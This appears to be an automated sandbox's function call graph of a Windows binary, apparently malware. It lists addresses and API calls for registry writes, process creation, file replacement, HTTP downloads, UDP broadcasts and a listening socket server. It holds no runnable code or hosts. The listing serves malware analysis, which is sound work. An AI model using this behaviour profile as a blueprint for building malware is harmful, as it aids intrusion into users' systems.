40d740 memset CreateProcessW 4297->4336 4298->4297 4299 40690c 4300 4067bf 9 API calls 4344 404200 InitializeCriticalSection CreateFileW 4300->4344 4306 406562 4301->4306 4307 4064dd RegSetValueExW RegCloseKey 4301->4307 4302->4303 4303->4251 4309 406193 MoveFileW DeleteFileW Sleep MoveFileW 4303->4309 4308 40d740 5 API calls 4306->4308 4307->4306 4313 40656e 4308->4313 4309->4303 4313->4264 4317 406579 ExitProcess 4313->4317 4314 406458 ExitProcess 4320 406874 CreateEventA 4376 40abd0 4320->4376 4329 40bf50 17 API calls 4330 4068d4 4329->4330 4331 40bf50 17 API calls 4330->4331 4332 4068f0 4331->4332 4333 40bf50 17 API calls 4332->4333 4333->4299 4335 406323 4334->4335 4335->4278 4335->4279 4337 40d7a0 Sleep 4336->4337 4338 40d7af ShellExecuteW 4336->4338 4339 40644d 4337->4339 4338->4339 4340 40d7d5 Sleep 4338->4340 4339->4288 4339->4314 4340->4339 4421 40b470 4341->4421 4345 404325 4344->4345 4346 404238 CreateFileMappingW 4344->4346 4358 40d3d0 CoInitializeEx 4345->4358 4347 404259 MapViewOfFile 4346->4347 4348 40431b CloseHandle 4346->4348 4349 404311 CloseHandle 4347->4349 4350 404278 GetFileSize 4347->4350 4348->4345 4349->4348 4353 40428d 4350->4353 4351 404307 UnmapViewOfFile 4351->4349 4352 40429c 4352->4351 4353->4351 4353->4352 4355 4042cc 4353->4355 4550 40b4f0 4353->4550 4557 4040f0 4353->4557 4356 408fb0 __aligned_recalloc_base 3 API calls 4355->4356 4356->4352 4794 40c930 socket 4358->4794 4360 40d3f0 4361 40686f 4360->4361 4364 40d43a 4360->4364 4370 40d478 4360->4370 4804 40cfe0 4360->4804 4371 4057b0 CoInitializeEx SysAllocString 4361->4371 4819 409880 htons 4364->4819 4369 40d350 24 API calls 4369->4370 4838 4090d0 4370->4838 4372 4057d2 4371->4372 4373 4057e8 CoUninitialize 4371->4373 4983 405520 4372->4983 4373->4320 4992 40ab90 4376->4992 4379 40ab90 3 API calls 4380 40abee 4379->4380 4381 40ab90 3 API calls 4380->4381 4382 40abfe 4381->4382 4383 40ab90 3 API calls 4382->4383 4384 40688c 4383->4384 4385 40bea0 4384->4385 4386 408e40 7 API calls 4385->4386 4387 40beab 4386->4387 4388 406896 4387->4388 4389 40beb7 InitializeCriticalSection 4387->4389 4390 40a020 InitializeCriticalSection 4388->4390 4389->4388 4395 40a03a 4390->4395 4391 40a069 CreateFileW 4393 40a090 CreateFileMappingW 4391->4393 4394 40a152 4391->4394 4397 40a0b1 MapViewOfFile 4393->4397 4398 40a148 CloseHandle 4393->4398 5027 409a90 EnterCriticalSection 4394->5027 4395->4391 4999 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 4395->4999 5000 409d70 4395->5000 4401 40a0cc GetFileSize 4397->4401 4402 40a13e CloseHandle 4397->4402 4398->4394 4400 40a157 4403 40bf50 17 API calls 4400->4403 4407 40a0eb 4401->4407 4402->4398 4404 4068a0 4403->4404 4409 40bf50 4404->4409 4405 40a134 UnmapViewOfFile 4405->4402 4407->4405 4408 409d70 25 API calls 4407->4408 5026 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 4407->5026 4408->4407 4410 40bf67 EnterCriticalSection 4409->4410 4411 4068b9 4409->4411 5047 40bed0 4410->5047 4411->4329 4414 40c02b LeaveCriticalSection 4414->4411 4415 408ea0 9 API calls 4416 40bfa9 4415->4416 4416->4414 4417 40bfbb CreateThread 4416->4417 4417->4414 4418 40bfde 4417->4418 4419 40c002 GetCurrentProcess GetCurrentProcess DuplicateHandle 4418->4419 4420 40c024 4418->4420 4419->4420 4420->4414 4424 40b410 4421->4424 4425 40b443 4424->4425 4426 40b42e 4424->4426 4428 4067b4 4425->4428 4456 40b240 4425->4456 4430 40b0c0 4426->4430 4428->4299 4428->4300 4431 40b0e9 4430->4431 4432 40b172 4430->4432 4455 40b16a 4431->4455 4490 408e40 4431->4490 4434 408e40 7 API calls 4432->4434 4432->4455 4436 40b198 4434->4436 4439 401000 7 API calls 4436->4439 4436->4455 4440 40b1c5 4439->4440 4442 4011e0 10 API calls 4440->4442 4444 40b1df 4442->4444 4443 40b13f 4445 401000 7 API calls 4443->4445 4446 401000 7 API calls 4444->4446 4447 40b150 4445->4447 4448 40b1f0 4446->4448 4449 4011e0 10 API calls 4447->4449 4450 4011e0 10 API calls 4448->4450 4449->4455 4451 40b20a 4450->4451 4452 401000 7 API calls 4451->4452 4453 40b21b 4452->4453 4454 4011e0 10 API calls 4453->4454 4454->4455 4455->4428 4457 40b269 4456->4457 4458 40b31a 4456->4458 4459 40b312 4457->4459 4460 408e40 7 API calls 4457->4460 4458->4459 4462 408e40 7 API calls 4458->4462 4459->4428 4461 40b27f 4460->4461 4461->4459 4464 401000 7 API calls 4461->4464 4463 40b33e 4462->4463 4463->4459 4466 401000 7 API calls 4463->4466 4465 40b2a3 4464->4465 4467 408e40 7 API calls 4465->4467 4468 40b362 4466->4468 4469 40b2b2 4467->4469 4470 408e40 7 API calls 4468->4470 4471 4011e0 10 API calls 4469->4471 4472 40b371 4470->4472 4473 40b2db 4471->4473 4474 4011e0 10 API calls 4472->4474 4475 408fb0 __aligned_recalloc_base 3 API calls 4473->4475 4476 40b39a 4474->4476 4477 40b2e7 4475->4477 4478 408fb0 __aligned_recalloc_base 3 API calls 4476->4478 4479 401000 7 API calls 4477->4479 4480 40b3a6 4478->4480 4482 40b2f8 4479->4482 4481 401000 7 API calls 4480->4481 4483 40b3b7 4481->4483 4484 4011e0 10 API calls 4482->4484 4485 4011e0 10 API calls 4483->4485 4484->4459 4486 40b3d1 4485->4486 4487 401000 7 API calls 4486->4487 4488 40b3e2 4487->4488 4489 4011e0 10 API calls 4488->4489 4489->4459 4501 408da0 4490->4501 4493 401000 4522 408e60 4493->4522 4498 4011e0 4529 4010c0 4498->4529 4500 4011ff _invalid_parameter 4500->4443 4510 408b90 GetCurrentProcessId 4501->4510 4503 408dab 4506 408db7 __aligned_recalloc_base 4503->4506 4511 408d00 4503->4511 4505 408e2c 4505->4455 4505->4493 4506->4505 4507 408dd2 HeapAlloc 4506->4507 4507->4505 4508 408df9 __aligned_recalloc_base 4507->4508 4508->4505 4509 408e14 memset 4508->4509 4509->4505 4510->4503 4519 408b90 GetCurrentProcessId 4511->4519 4513 408d09 4514 408d26 HeapCreate 4513->4514 4520 408c70 GetProcessHeaps 4513->4520 4516 408d40 HeapSetInformation GetCurrentProcessId 4514->4516 4517 408d67 4514->4517 4516->4517 4517->4506 4519->4513 4521 408ca1 4520->4521 4521->4514 4521->4517 4523 408da0 __aligned_recalloc_base 7 API calls 4522->4523 4524 40100b 4523->4524 4525 401400 4524->4525 4526 40140a 4525->4526 4527 408e60 __aligned_recalloc_base 7 API calls 4526->4527 4528 401018 4527->4528 4528->4498 4530 40110e 4529->4530 4532 4010d1 4529->4532 4531 408e60 __aligned_recalloc_base 7 API calls 4530->4531 4530->4532 4535 401132 _invalid_parameter 4531->4535 4532->4500 4533 401162 memcpy 4534 401186 _invalid_parameter 4533->4534 4537 408fb0 __aligned_recalloc_base 3 API calls 4534->4537 4535->4533 4539 408fb0 4535->4539 4537->4532 4546 408b90 GetCurrentProcessId 4539->4546 4541 408fbb 4542 40115f 4541->4542 4547 408bb0 4541->4547 4542->4533 4545 408fd7 HeapFree 4545->4542 4546->4541 4548 408be0 HeapValidate 4547->4548 4549 408c00 4547->4549 4548->4549 4549->4542 4549->4545 4566 409020 4550->4566 4553 40b531 4553->4353 4556 408fb0 __aligned_recalloc_base 3 API calls 4556->4553 4774 408ea0 4557->4774 4560 409020 8 API calls 4561 40415b 4560->4561 4784 40ae60 4561->4784 4564 4041e1 4564->4353 4567 40904d 4566->4567 4568 408e60 __aligned_recalloc_base 7 API calls 4567->4568 4569 409062 4567->4569 4570 409064 memcpy 4567->4570 4568->4567 4569->4553 4571 40aa00 4569->4571 4570->4567 4578 40aa0c 4571->4578 4573 40aa2b 4573->4553 4573->4556 4575 40aa68 4576 408fb0 __aligned_recalloc_base 3 API calls 4575->4576 4576->4573 4577 408fb0 __aligned_recalloc_base 3 API calls 4577->4578 4578->4573 4578->4575 4578->4577 4579 40af50 4578->4579 4593 406920 4578->4593 4580 40af5f __aligned_recalloc_base 4579->4580 4581 408e60 __aligned_recalloc_base 7 API calls 4580->4581 4592 40af69 4580->4592 4582 40aff8 4581->4582 4583 401000 7 API calls 4582->4583 4582->4592 4584 40b00d 4583->4584 4585 401000 7 API calls 4584->4585 4586 40b015 4585->4586 4588 40b06d __aligned_recalloc_base 4586->4588 4596 40aef0 4586->4596 4601 401050 4588->4601 4591 401050 3 API calls 4591->4592 4592->4578 4709 408b10 4593->4709 4597 4011e0 10 API calls 4596->4597 4598 40af04 4597->4598 4607 4013e0 4598->4607 4600 40af1c 4600->4586 4603 401064 _invalid_parameter 4601->4603 4604 4010ae 4601->4604 4602 408fb0 __aligned_recalloc_base 3 API calls 4602->4604 4605 408fb0 __aligned_recalloc_base 3 API calls 4603->4605 4606 40108c 4603->4606 4604->4591 4605->4606 4606->4602 4610 4012d0 4607->4610 4609 4013fa 4609->4600 4611 4012e4 4610->4611 4612 4010c0 __aligned_recalloc_base 10 API calls 4611->4612 4613 40132d 4612->4613 4614 4010c0 __aligned_recalloc_base 10 API calls 4613->4614 4615 40133d 4614->4615 4616 4010c0 __aligned_recalloc_base 10 API calls 4615->4616 4617 40134d 4616->4617 4618 4010c0 __aligned_recalloc_base 10 API calls 4617->4618 4619 40135d 4618->4619 4620 401366 4619->4620 4621 40138f 4619->4621 4625 402c20 4620->4625 4642 4029d0 4621->4642 4624 401387 _invalid_parameter 4624->4609 4626 401400 _invalid_parameter 7 API calls 4625->4626 4627 402c37 4626->4627 4628 401400 _invalid_parameter 7 API calls 4627->4628 4629 402c46 4628->4629 4630 401400 _invalid_parameter 7 API calls 4629->4630 4631 402c55 4630->4631 4632 401400 _invalid_parameter 7 API calls 4631->4632 4641 402c64 _invalid_parameter 4632->4641 4634 402e0f _invalid_parameter 4635 401430 _invalid_parameter 3 API calls 4634->4635 4636 402e35 _invalid_parameter 4634->4636 4635->4634 4637 401430 _invalid_parameter 3 API calls 4636->4637 4638 402e5b _invalid_parameter 4636->4638 4637->4636 4639 401430 _invalid_parameter 3 API calls 4638->4639 4640 402e81 4638->4640 4639->4638 4640->4624 4641->4634 4645 401430 4641->4645 4649 402e90 4642->4649 4644 4029ec 4644->4624 4646 401446 4645->4646 4647 40143b 4645->4647 4646->4641 4648 408fb0 __aligned_recalloc_base 3 API calls 4647->4648 4648->4646 4650 402ea6 _invalid_parameter 4649->4650 4651 402eb8 _invalid_parameter 4650->4651 4652 402edd 4650->4652 4654 402f03 4650->4654 4651->4644 4679 402880 4652->4679 4655 402f3d 4654->4655 4656 402f5e 4654->4656 4689 402a00 4655->4689 4657 401400 _invalid_parameter 7 API calls 4656->4657 4659 402f6f 4657->4659 4660 401400 _invalid_parameter 7 API calls 4659->4660 4661 402f7e 4660->4661 4662 401400 _invalid_parameter 7 API calls 4661->4662 4663 402f8d 4662->4663 4664 401400 _invalid_parameter 7 API calls 4663->4664 4665 402f9c 4664->4665 4702 402950 4665->4702 4667 401400 _invalid_parameter 7 API calls 4668 402fca _invalid_parameter 4667->4668 4668->4667 4671 403084 _invalid_parameter 4668->4671 4669 401430 _invalid_parameter 3 API calls 4669->4671 4670 4033a3 _invalid_parameter 4672 401430 _invalid_parameter 3 API calls 4670->4672 4673 4033c9 _invalid_parameter 4670->4673 4671->4669 4671->4670 4672->4670 4674 401430 _invalid_parameter 3 API calls 4673->4674 4675 4033ef _invalid_parameter 4673->4675 4674->4673 4676 401430 _invalid_parameter 3 API calls 4675->4676 4677 403415 _invalid_parameter 4675->4677 4676->4675 4677->4651 4678 401430 _invalid_parameter 3 API calls 4677->4678 4678->4677 4680 40288e 4679->4680 4681 401400 _invalid_parameter 7 API calls 4680->4681 4682 4028ab 4681->4682 4683 401400 _invalid_parameter 7 API calls 4682->4683 4684 4028ba _invalid_parameter 4683->4684 4685 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4684->4685 4686 40291a _invalid_parameter 4684->4686 4685->4684 4687 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4686->4687 4688 402940 4686->4688 4687->4686 4688->4651 4690 401400 _invalid_parameter 7 API calls 4689->4690 4691 402a17 4690->4691 4692 401400 _invalid_parameter 7 API calls 4691->4692 4693 402a26 4692->4693 4694 401400 _invalid_parameter 7 API calls 4693->4694 4701 402a35 _invalid_parameter 4694->4701 4695 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4695->4701 4696 402bc1 _invalid_parameter 4697 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4696->4697 4698 402be7 _invalid_parameter 4696->4698 4697->4696 4699 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4698->4699 4700 402c0d 4698->4700 4699->4698 4700->4651 4701->4695 4701->4696 4703 401400 _invalid_parameter 7 API calls 4702->4703 4704 40295f _invalid_parameter 4703->4704 4705 402880 _invalid_parameter 9 API calls 4704->4705 4706 402998 _invalid_parameter 4705->4706 4707 401430 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4706->4707 4708 4029c3 4706->4708 4707->4706 4708->4668 4710 408b22 4709->4710 4713 408a70 4710->4713 4714 408e60 __aligned_recalloc_base 7 API calls 4713->4714 4715 408a80 4714->4715 4718 408abc 4715->4718 4720 40693f 4715->4720 4722 407fb0 4715->4722 4729 408590 4715->4729 4734 408960 4715->4734 4719 408fb0 __aligned_recalloc_base 3 API calls 4718->4719 4719->4720 4720->4578 4723 407fc3 4722->4723 4728 407fb9 4722->4728 4724 408006 memset 4723->4724 4723->4728 4725 408027 4724->4725 4724->4728 4726 40802d memcpy 4725->4726 4725->4728 4742 407d80 4726->4742 4728->4715 4730 40859d 4729->4730 4731 4085a7 4729->4731 4730->4715 4731->4730 4732 40869f memcpy 4731->4732 4747 4082d0 4731->4747 4732->4731 4736 408976 4734->4736 4740 40896c 4734->4740 4735 4082d0 57 API calls 4737 4089f7 4735->4737 4736->4735 4736->4740 4738 407d80 6 API calls 4737->4738 4737->4740 4739 408a16 4738->4739 4739->4740 4741 408a2b memcpy 4739->4741 4740->4715 4741->4740 4743 407dce 4742->4743 4745 407d8e 4742->4745 4743->4728 4745->4743 4746 407cc0 6 API calls 4745->4746 4746->4745 4748 4082e1 4747->4748 4749 4082eb 4747->4749 4748->4731 4749->4748 4753 408110 4749->4753 4752 4082d0 57 API calls 4752->4748 4754 408127 4753->4754 4755 40811d 4753->4755 4754->4755 4756 4081b0 4754->4756 4757 4081b5 4754->4757 4758 408198 4754->4758 4755->4748 4755->4752 4764 407a70 4756->4764 4762 407d80 6 API calls 4757->4762 4761 407d80 6 API calls 4758->4761 4761->4756 4762->4756 4763 40825c memset 4763->4755 4765 407a89 4764->4765 4773 407a7f 4764->4773 4766 407950 6 API calls 4765->4766 4765->4773 4767 407b82 4766->4767 4768 408e60 __aligned_recalloc_base 7 API calls 4767->4768 4769 407bd1 4768->4769 4770 4077d0 44 API calls 4769->4770 4769->4773 4771 407bfe 4770->4771 4772 408fb0 __aligned_recalloc_base GetCurrentProcessId HeapValidate HeapFree 4771->4772 4772->4773 4773->4755 4773->4763 4793 408b90 GetCurrentProcessId 4774->4793 4776 408eab 4777 408d00 __aligned_recalloc_base 5 API calls 4776->4777 4783 408eb7 __aligned_recalloc_base 4776->4783 4777->4783 4778 404117 4778->4560 4778->4564 4779 408bb0 __aligned_recalloc_base HeapValidate 4779->4783 4780 408f60 HeapAlloc 4780->4783 4781 408f2a HeapReAlloc 4781->4783 4782 408fb0 __aligned_recalloc_base 3 API calls 4782->4783 4783->4778 4783->4779 4783->4780 4783->4781 4783->4782 4787 40ae6b 4784->4787 4785 408e60 __aligned_recalloc_base 7 API calls 4785->4787 4786 4041a6 4786->4564 4788 4058a0 4786->4788 4787->4785 4787->4786 4789 408e60 __aligned_recalloc_base 7 API calls 4788->4789 4790 4058b0 4789->4790 4791 4058f7 4790->4791 4792 4058bc memcpy CreateThread CloseHandle 4790->4792 4791->4564 4792->4791 4793->4776 4795 40c95d htons inet_addr setsockopt 4794->4795 4801 40ca8e 4794->4801 4796 409880 8 API calls 4795->4796 4797 40c9d6 bind lstrlenA sendto ioctlsocket 4796->4797 4802 40ca2b 4797->4802 4798 40ca52 4851 409940 shutdown closesocket 4798->4851 4801->4360 4802->4798 4803 408ea0 9 API calls 4802->4803 4842 40c840 4802->4842 4803->4802 4858 40c610 memset InternetCrackUrlA InternetOpenA 4804->4858 4807 40d0fe 4807->4360 4809 408fb0 __aligned_recalloc_base 3 API calls 4809->4807 4813 40d0cb 4813->4809 4816 40d0c1 SysFreeString 4816->4813 4965 409840 inet_addr 4819->4965 4822 40992d 4827 40d350 4822->4827 4823 4098dc connect 4824 4098f0 getsockname 4823->4824 4825 409924 4823->4825 4824->4825 4968 409940 shutdown closesocket 4825->4968 4969 409820 inet_ntoa 4827->4969 4829 40d366 4830 40b790 11 API calls 4829->4830 4831 40d385 4830->4831 4832 40d3c8 4831->4832 4970 40d110 memset InternetCrackUrlA InternetOpenA 4831->4970 4832->4369 4835 40d3bc 4836 408fb0 __aligned_recalloc_base 3 API calls 4835->4836 4836->4832 4837 408fb0 __aligned_recalloc_base 3 API calls 4837->4835 4841 4090d4 4838->4841 4839 4090da 4839->4361 4840 408fb0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 4840->4841 4841->4839 4841->4840 4843 40c85c 4842->4843 4844 40c924 4843->4844 4845 40c878 recvfrom 4843->4845 4844->4802 4846 40c8a6 StrCmpNIA 4845->4846 4847 40c899 Sleep 4845->4847 4846->4843 4848 40c8c5 StrStrIA 4846->4848 4847->4843 4848->4843 4849 40c8e6 StrChrA 4848->4849 4852 40b640 4849->4852 4851->4801 4854 40b64b 4852->4854 4853 40b651 lstrlenA 4853->4854 4855 40b664 4853->4855 4854->4853 4854->4855 4856 408e60 __aligned_recalloc_base 7 API calls 4854->4856 4857 40b680 memcpy 4854->4857 4855->4843 4856->4854 4857->4854 4857->4855 4859 40c6b1 InternetConnectA 4858->4859 4860 40c827 4858->4860 4861 40c81a InternetCloseHandle 4859->4861 4862 40c6ea HttpOpenRequestA 4859->4862 4860->4807 4871 40c3b0 4860->4871 4861->4860 4863 40c720 HttpSendRequestA 4862->4863 4864 40c80d InternetCloseHandle 4862->4864 4865 40c800 InternetCloseHandle 4863->4865 4867 40c73d 4863->4867 4864->4861 4865->4864 4866 40c75e InternetReadFile 4866->4867 4868 40c78b 4866->4868 4867->4866 4867->4868 4869 408ea0 9 API calls 4867->4869 4868->4865 4870 40c7a6 memcpy 4869->4870 4870->4867 4900 40b570 4871->4900 4874 40c3da SysAllocString 4875 40c3f1 CoCreateInstance 4874->4875 4876 40c4a7 4874->4876 4877 40c49d SysFreeString 4875->4877 4880 40c416 4875->4880 4878 408fb0 __aligned_recalloc_base 3 API calls 4876->4878 4877->4876 4879 40c4b0 4878->4879 4879->4813 4881 40cf90 4879->4881 4880->4877 4917 40c4c0 4881->4917 4884 40ce70 4922 40cc90 4884->4922 4889 40cdf0 6 API calls 4890 40cec7 4889->4890 4896 40cf19 4890->4896 4939 40cc10 4890->4939 4893 40ceff 4893->4896 4944 40c5b0 4893->4944 4894 40cc10 6 API calls 4894->4893 4896->4816 4897 40b790 4896->4897 4960 40b700 4897->4960 4905 40b57d 4900->4905 4901 40b583 lstrlenA 4903 40b596 4901->4903 4901->4905 4903->4874 4903->4879 4904 408e60 __aligned_recalloc_base 7 API calls 4904->4905 4905->4901 4905->4903 4905->4904 4907 408fb0 __aligned_recalloc_base 3 API calls 4905->4907 4908 403b70 4905->4908 4912 403c40 4905->4912 4907->4905 4909 403b87 MultiByteToWideChar 4908->4909 4910 403b7a lstrlenA 4908->4910 4911 403bac 4909->4911 4910->4909 4911->4905 4915 403c4b 4912->4915 4913 403c51 lstrlenA 4913->4915 4914 403b70 2 API calls 4914->4915 4915->4913 4915->4914 4916 403c87 4915->4916 4916->4905 4918 40c4e6 4917->4918 4919 40c563 lstrcmpiW 4918->4919 4920 40c58b 4918->4920 4921 40c57b SysFreeString 4918->4921 4919->4918 4919->4921 4920->4813 4920->4884 4921->4918 4924 40ccb6 4922->4924 4923 40cdcd 4923->4896 4934 40cdf0 4923->4934 4924->4923 4925 40cd43 lstrcmpiW 4924->4925 4926 40cdc3 SysFreeString 4925->4926 4927 40cd56 4925->4927 4926->4923 4928 40c5b0 2 API calls 4927->4928 4930 40cd64 4928->4930 4929 40cdb5 4929->4926 4930->4926 4930->4929 4931 40cd93 lstrcmpiW 4930->4931 4932 40cda5 4931->4932 4933 40cdab SysFreeString 4931->4933 4932->4933 4933->4929 4935 40c5b0 2 API calls 4934->4935 4937 40ce0b 4935->4937 4936 40ce47 4936->4889 4936->4896 4937->4936 4938 40cc90 6 API calls 4937->4938 4938->4936 4940 40c5b0 2 API calls 4939->4940 4942 40cc2b 4940->4942 4941 40cc67 4941->4893 4941->4894 4942->4941 4948 40cab0 4942->4948 4946 40c5d6 4944->4946 4945 40c5ed 4945->4896 4946->4945 4947 40c4c0 2 API calls 4946->4947 4947->4945 4950 40cad6 4948->4950 4949 40cbed 4949->4941 4950->4949 4951 40cb63 lstrcmpiW 4950->4951 4952 40cbe3 SysFreeString 4951->4952 4953 40cb76 4951->4953 4952->4949 4954 40c5b0 2 API calls 4953->4954 4956 40cb84 4954->4956 4955 40cbd5 4955->4952 4956->4952 4956->4955 4957 40cbb3 lstrcmpiW 4956->4957 4958 40cbc5 4957->4958 4959 40cbcb SysFreeString 4957->4959 4958->4959 4959->4955 4963 40b70d 4960->4963 4961 40b728 SysFreeString 4961->4816 4962 408ea0 9 API calls 4962->4963 4963->4961 4963->4962 4964 40b6b0 _vscprintf wvsprintfA 4963->4964 4964->4963 4966 40986c socket 4965->4966 4967 409859 gethostbyname 4965->4967 4966->4822 4966->4823 4967->4966 4968->4822 4969->4829 4971 40d341 4970->4971 4972 40d1b4 InternetConnectA 4970->4972 4971->4835 4971->4837 4973 40d334 InternetCloseHandle 4972->4973 4974 40d1ed HttpOpenRequestA 4972->4974 4973->4971 4975 40d223 HttpAddRequestHeadersA HttpSendRequestA 4974->4975 4976 40d327 InternetCloseHandle 4974->4976 4977 40d31a InternetCloseHandle 4975->4977 4978 40d26d 4975->4978 4976->4973 4977->4976 4979 40d284 InternetReadFile 4978->4979 4980 40d2b1 4978->4980 4981 408ea0 9 API calls 4978->4981 4979->4978 4979->4980 4980->4977 4982 40d2cc memcpy 4981->4982 4982->4978 4989 405557 4983->4989 4984 4054d0 CoCreateInstance 4984->4989 4985 40572b 4987 405734 SysFreeString 4985->4987 4988 40573e SysFreeString 4985->4988 4986 408fb0 __aligned_recalloc_base 3 API calls 4986->4985 4987->4988 4988->4373 4989->4984 4990 4056a6 SysAllocString 4989->4990 4991 405572 4989->4991 4990->4989 4990->4991 4991->4985 4991->4986 4993 40ab9e 4992->4993 4995 40ab9a 4992->4995 4996 40ab50 CryptAcquireContextW 4993->4996 4995->4379 4997 40ab8b 4996->4997 4998 40ab6d CryptGenRandom CryptReleaseContext 4996->4998 4997->4995 4998->4997 4999->4395 5030 409ab0 gethostname 5000->5030 5003 409d89 5003->4395 5005 409d9c strstr 5006 409dac 5005->5006 5007 409ded EnterCriticalSection 5005->5007 5034 409820 inet_ntoa 5006->5034 5008 409e05 5007->5008 5015 409e30 5008->5015 5036 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5008->5036 5010 409dba strstr 5010->5003 5011 409dca 5010->5011 5035 409820 inet_ntoa 5011->5035 5014 409f29 LeaveCriticalSection 5014->5003 5015->5014 5017 408e40 7 API calls 5015->5017 5016 409dd8 strstr 5016->5003 5016->5007 5018 409e74 5017->5018 5018->5014 5037 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5018->5037 5020 409e92 5021 409eb4 Sleep 5020->5021 5022 409ebe 5020->5022 5024 409ee4 5020->5024 5021->5020 5023 408fb0 __aligned_recalloc_base 3 API calls 5022->5023 5023->5024 5024->5014 5038 4099a0 5024->5038 5026->4407 5028 4099a0 14 API calls 5027->5028 5029 409aa3 LeaveCriticalSection 5028->5029 5029->4400 5031 409ad7 gethostbyname 5030->5031 5032 409af3 5030->5032 5031->5032 5032->5003 5033 409820 inet_ntoa 5032->5033 5033->5005 5034->5010 5035->5016 5036->5015 5037->5020 5039 4099b4 5038->5039 5046 4099af 5038->5046 5040 408e60 __aligned_recalloc_base 7 API calls 5039->5040 5041 4099c8 5040->5041 5042 409a24 CreateFileW 5041->5042 5041->5046 5043 409a73 InterlockedExchange 5042->5043 5044 409a47 WriteFile FlushFileBuffers CloseHandle 5042->5044 5045 408fb0 __aligned_recalloc_base 3 API calls 5043->5045 5044->5043 5045->5046 5046->5014 5050 40bedd 5047->5050 5048 40bf41 5048->4414 5048->4415 5049 40bf01 WaitForSingleObject 5049->5050 5051 40bf1c CloseHandle 5049->5051 5050->5048 5050->5049 5051->5050 5435 40c360 5441 40dc40 5435->5441 5437 40c377 5438 40c3a1 5437->5438 5439 40c388 WaitForSingleObject 5437->5439 5440 40e0a0 8 API calls 5439->5440 5440->5438 5442 40dd2e 5441->5442 5443 40dc4e 5441->5443 5442->5437 5443->5442 5444 408e40 7 API calls 5443->5444 5445 40dc5e CreateEventA socket 5444->5445 5446 40dc95 5445->5446 5447 40dc9a 5445->5447 5448 40e0a0 8 API calls 5446->5448 5447->5442 5449 40dca4 htons setsockopt bind 5447->5449 5448->5447 5450 40dd14 CreateThread 5449->5450 5451 40dd08 5449->5451 5450->5442 5452 40e0a0 8 API calls 5451->5452 5453 40dd0d 5452->5453 5453->5437 5454 409960 5455 409963 WaitForSingleObject 5454->5455 5456 409991 5455->5456 5457 40997b InterlockedDecrement 5455->5457 5458 40998a 5457->5458 5458->5455 5459 409a90 16 API calls 5458->5459 5459->5458 5770 40bca0 5775 40e9e0 5770->5775 5772 40bcb5 5773 40bcd3 5772->5773 5774 40e9e0 16 API calls 5772->5774 5774->5773 5776 40eabb 5775->5776 5777 40e9f0 5775->5777 5776->5772 5777->5776 5778 408e40 7 API calls 5777->5778 5779 40ea18 5778->5779 5779->5776 5780 409020 8 API calls 5779->5780 5781 40ea44 5780->5781 5782 40ea60 5781->5782 5783 40ea51 5781->5783 5785 40e960 4 API calls 5782->5785 5784 408fb0 __aligned_recalloc_base 3 API calls 5783->5784 5786 40ea57 5784->5786 5787 40ea6d 5785->5787 5786->5772 5788 40ea76 EnterCriticalSection 5787->5788 5789 40eaac 5787->5789 5790 40ea99 LeaveCriticalSection 5788->5790 5791 40ea8d 5788->5791 5792 408fb0 __aligned_recalloc_base 3 API calls 5789->5792 5790->5772 5791->5790 5793 40eab5 5792->5793 5794 408fb0 __aligned_recalloc_base 3 API calls 5793->5794 5794->5776 5795 40e7a0 GetTickCount WaitForSingleObject 5796 40e949 5795->5796 5797 40e7cd WSAWaitForMultipleEvents 5795->5797 5798 40e870 GetTickCount 5797->5798 5799 40e7ea WSAEnumNetworkEvents 5797->5799 5800 40e8c3 GetTickCount 5798->5800 5801 40e885 EnterCriticalSection 5798->5801 5799->5798 5809 40e803 5799->5809 5802 40e935 WaitForSingleObject 5800->5802 5803 40e8ce EnterCriticalSection 5800->5803 5804 40e896 5801->5804 5805 40e8ba LeaveCriticalSection 5801->5805 5802->5796 5802->5797 5806 40e921 LeaveCriticalSection GetTickCount 5803->5806 5807 40e8df InterlockedExchangeAdd 5803->5807 5811 40e8a9 LeaveCriticalSection 5804->5811 5837 40e6a0 5804->5837 5805->5802 5806->5802 5847 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5807->5847 5808 40e812 accept 5808->5798 5808->5809 5809->5798 5809->5808 5816 40eb70 7 API calls 5809->5816 5817 40e330 5809->5817 5811->5802 5814 40e8f2 5814->5806 5814->5807 5848 409940 shutdown closesocket 5814->5848 5816->5798 5818 40e342 EnterCriticalSection 5817->5818 5819 40e33d 5817->5819 5820 40e357 5818->5820 5821 40e36d LeaveCriticalSection 5818->5821 5819->5809 5820->5821 5822 40e378 5821->5822 5823 40e37f 5821->5823 5822->5809 5824 408e40 7 API calls 5823->5824 5825 40e389 5824->5825 5826 40e396 getpeername CreateIoCompletionPort 5825->5826 5827 40e428 5825->5827 5829 40e422 5826->5829 5830 40e3d6 5826->5830 5851 409940 shutdown closesocket 5827->5851 5832 408fb0 __aligned_recalloc_base 3 API calls 5829->5832 5849 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5830->5849 5832->5827 5833 40e433 5833->5809 5834 40e3db InterlockedExchange InitializeCriticalSection InterlockedIncrement 5850 40e250 EnterCriticalSection LeaveCriticalSection 5834->5850 5836 40e41b 5836->5809 5838 40e6b0 5837->5838 5845 40e781 5837->5845 5839 40e6bd InterlockedExchangeAdd 5838->5839 5838->5845 5839->5845 5846 40e6d4 5839->5846 5840 40e700 5841 40e711 5840->5841 5861 409940 shutdown closesocket 5840->5861 5842 40e727 InterlockedDecrement 5841->5842 5841->5845 5842->5845 5845->5805 5846->5840 5846->5845 5852 40e620 EnterCriticalSection 5846->5852 5847->5814 5848->5814 5849->5834 5850->5836 5851->5833 5853 40e687 LeaveCriticalSection 5852->5853 5854 40e63a InterlockedExchangeAdd 5852->5854 5853->5846 5855 40e64a LeaveCriticalSection 5854->5855 5856 40e659 5854->5856 5855->5846 5857 408fb0 __aligned_recalloc_base 3 API calls 5856->5857 5858 40e67e 5857->5858 5859 408fb0 __aligned_recalloc_base 3 API calls 5858->5859 5860 40e684 5859->5860 5860->5853 5861->5841 5460 404565 5462 4044de 5460->5462 